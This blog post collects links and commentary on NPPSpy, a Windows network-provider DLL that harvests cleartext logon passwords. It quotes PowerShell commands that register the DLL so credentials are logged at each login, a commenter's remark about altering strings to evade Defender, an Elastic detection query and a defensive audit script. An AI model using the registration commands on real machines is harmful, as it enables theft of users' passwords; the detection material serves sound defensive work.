Link archive: Windows PSBits/PasswordStealing/NPPSpy at master · gtworek/PSBits
Posted by jpluimers on 2024/12/12
Simple (but fully working) code for NPLogonNotify(). The function obtains logon data, including cleartext password.
[Wayback/Archive] PSBits/PasswordStealing/NPPSpy at master · gtworek/PSBits has been used in the wild since about 2022 (the code is from 2020).
The code is a ~100-line C file that builds into a DLL exporting the NPGetCaps() and NPLogonNotify() functions, which is all a network provider needs for Winlogon to hand it the logon credentials.
Background/related:
- [Wayback/Archive] PSBits/NPPSPy.cat at master · gtworek/PSBits
- [Wayback/Archive] NPGetCaps function (npapi.h) – Win32 apps | Microsoft Docs
- [Wayback/Archive] NPLogonNotify function (npapi.h) – Win32 apps | Microsoft Docs (deprecated but likely around for a long time)
- [Wayback/Archive] How winlogon.exe shares the cleartext password with custom DLLs – YouTube
Just tried, set up a PIN, logoff/login, and after login with the PIN it gives me the password in plain text. I recompiled your DLL but was still getting flagged by the AV; I have to try to mask it by replacing some texts to see if I can evade Defender.
- [Wayback/Archive] Grzegorz Tworek on Twitter: “Thank you for the mention and great write-up :) It had to happen sooner or later… Lsass protection goes to some crazy levels at the same time leaving Winlogon crazy vulnerable, and even more talkative 🤷🏻♂️” (below thread saved as [Wayback/Archive] Thread by @Purp1eW0lf on Thread Reader App)
- [Wayback/Archive] Dray Agha on Twitter: “In a recent intrusion, we identified a threat actor had compromised the Windows login process, and siphoned cleartext credentials – using a technique known as NPPSPY @0gtweet’s NPPSPY was fascinating to dissect and remediate. Huge thanks to @keydet89 for guidance and wisdom”
- [Wayback/Archive] Dray Agha on Twitter: “Our article couldn’t show what this cleartext credential gathering looked like on the compromised machine, but we recreated the electrifying end product”
- [Wayback/Archive] Dray Agha on Twitter: “IOCs and Behavior – T1003 – Values under HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order ◦ For our case: logincontroll – Unexplained entries in HKLM\SYSTEM\CurrentControlSet\Services\\NetworkProvider ◦ For our case: logincontroll“
- [Wayback/Archive] Dray Agha on Twitter: “If you’re interested in more details, have a lil read of this www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy As always, thank you to our content team, @rachelbishop723 and Lily Teplow”
- [Wayback/Archive] sn🥶vvcr💥sh on Twitter: “So much fun automating this sick NPLogonNotify clear-text credential harvesting technique by @0gtweet! There’s a pretty cool blog post from @0x6d69636b on this subject, check it out 👇🏻👇🏻👇🏻 scip.ch/en/?labs.20220217“
- [Wayback/Archive] Network Provider – Sneaky alternative to extract credentials
  - Use
    The NPPSpy DLL is copied into the folder %WINDIR%\system32 with administrative rights. Afterwards, some registry keys must be set and NPPSpy must be registered as a network provider. This can be done with the following PowerShell commands:
    $NetworkProviderName = "NPPSpy"
    New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName"
    New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider"
    New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Class" -Value 2
    New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Name" -Value $NetworkProviderName
    New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\$NetworkProviderName.dll"
    $NetworkProviderPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name ProviderOrder
    $NetworkProviderOrder = $NetworkProviderPath.ProviderOrder + ",$NetworkProviderName"
    Set-ItemProperty -Path $NetworkProviderPath.PSPath -Name ProviderOrder -Value $NetworkProviderOrder
    After that, NPPSpy is active and saves the credentials in the file C:\NPPSpy.txt every time someone logs in.
  - To detect the attack, the registry key HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder should be monitored for changes. Furthermore, services that are registered as network providers can be monitored. The query suggested in the article Network Logon Provider Registry Modification can be used for Elasticsearch, for example:
    registry where registry.data.strings != null and
      registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath" and
      /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */
      not ( user.id : "S-1-5-18" and
            registry.data.strings in ("%SystemRoot%\\System32\\ntlanman.dll", "%SystemRoot%\\System32\\drprov.dll", "%SystemRoot%\\System32\\davclnt.dll") )
- [Wayback/Archive] Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting
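The quoted detection section only describes what to watch; as an added example (my own script, not code from the scip.ch article, the Elastic rule or the NPPSpy repository) the PowerShell below performs the same check on a live machine. It walks every HKLM\SYSTEM\CurrentControlSet\Services\<name>\NetworkProvider key, compares ProviderPath with the three stock provider DLLs the Elastic query excludes, checks the Authenticode status of the DLL, and reports names that appear in ProviderOrder without a matching NetworkProvider key. The function name Get-NetworkProviderAudit and the assumption that only ntlanman.dll, drprov.dll and davclnt.dll are legitimate on the host are mine; third-party VPN or filesystem clients that register a provider will show up as Suspicious and need to be whitelisted by hand.

```powershell
# Added audit script; not part of the linked article or of the NPPSpy repository.
# Read-only: nothing in the registry is modified. Read access to HKLM\SYSTEM is enough.

# Stock Windows providers, taken from the exclusion list of the Elastic query quoted above.
# Get-ItemProperty expands REG_EXPAND_SZ values, so both sides are compared fully expanded.
$KnownProviderDlls = @(
    '%SystemRoot%\System32\ntlanman.dll'   # LanmanWorkstation
    '%SystemRoot%\System32\drprov.dll'     # RDPNP
    '%SystemRoot%\System32\davclnt.dll'    # WebClient
) | ForEach-Object { [Environment]::ExpandEnvironmentVariables($_) }

function Get-NetworkProviderAudit {
    [CmdletBinding()]
    param()

    # The value NPPSpy-style installers append their service name to.
    $orderKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order'
    $orderValue = (Get-ItemProperty -Path $orderKey -Name ProviderOrder -ErrorAction SilentlyContinue).ProviderOrder
    $providerOrder = @()
    if ($orderValue) {
        $providerOrder = @($orderValue -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
    }

    # Every service carrying a NetworkProvider subkey, listed in ProviderOrder or not.
    $registered = @(Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        Where-Object { Test-Path -Path (Join-Path -Path $_.PSPath -ChildPath 'NetworkProvider') })

    foreach ($svc in $registered) {
        $np  = Get-ItemProperty -Path (Join-Path -Path $svc.PSPath -ChildPath 'NetworkProvider') -ErrorAction SilentlyContinue
        $dll = if ($np.ProviderPath) { [Environment]::ExpandEnvironmentVariables($np.ProviderPath) } else { $null }

        # -contains on a string array is case-insensitive, which suits Windows paths.
        $isKnown = [bool]$dll -and ($KnownProviderDlls -contains $dll)

        # Catalog-signed Microsoft DLLs report 'Valid'; an unsigned drop-in reports 'NotSigned'.
        $signature = if ($dll -and (Test-Path -LiteralPath $dll)) {
            (Get-AuthenticodeSignature -FilePath $dll).Status.ToString()
        } else {
            'FileMissing'
        }

        [PSCustomObject]@{
            Service         = $svc.PSChildName
            InProviderOrder = $providerOrder -contains $svc.PSChildName
            ProviderPath    = $dll
            Class           = $np.Class
            Signature       = $signature
            Suspicious      = (-not $isKnown) -or ($signature -ne 'Valid')
        }
    }

    # A name in ProviderOrder with no NetworkProvider key is a leftover or a half-finished install.
    foreach ($name in $providerOrder) {
        if ($registered.PSChildName -notcontains $name) {
            [PSCustomObject]@{
                Service         = $name
                InProviderOrder = $true
                ProviderPath    = $null
                Class           = $null
                Signature       = 'NoNetworkProviderKey'
                Suspicious      = $true
            }
        }
    }
}

# Usage: full inventory first, then only the rows that deserve a look.
Get-NetworkProviderAudit | Format-Table -AutoSize
Get-NetworkProviderAudit | Where-Object Suspicious | Format-List
```

On a clean workstation the inventory shows LanmanWorkstation, RDPNP and WebClient with Signature Valid and Suspicious False; an NPPSpy-style registration shows up with an unknown ProviderPath, usually Class 2, and a Signature of NotSigned or FileMissing. Running the function on a schedule and diffing its output against a baseline covers the ProviderOrder-change monitoring the article recommends on hosts that do not forward registry telemetry to Elasticsearch.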
InfoSec people from the above Tweets to follow on Twitter:
- [Wayback/Archive] Grzegorz Tworek (@0gtweet) / Twitter
- [Wayback/Archive] Dray Agha (@Purp1eW0lf) / Twitter
- [Wayback/Archive] Harlanoscopy (@keydet89) / Twitter
- [Wayback/Archive] sn🥶vvcr💥sh (@snovvcrash) / Twitter
- [Wayback/Archive] Michael Schneider (@0x6d69636b) / Twitter
–jeroen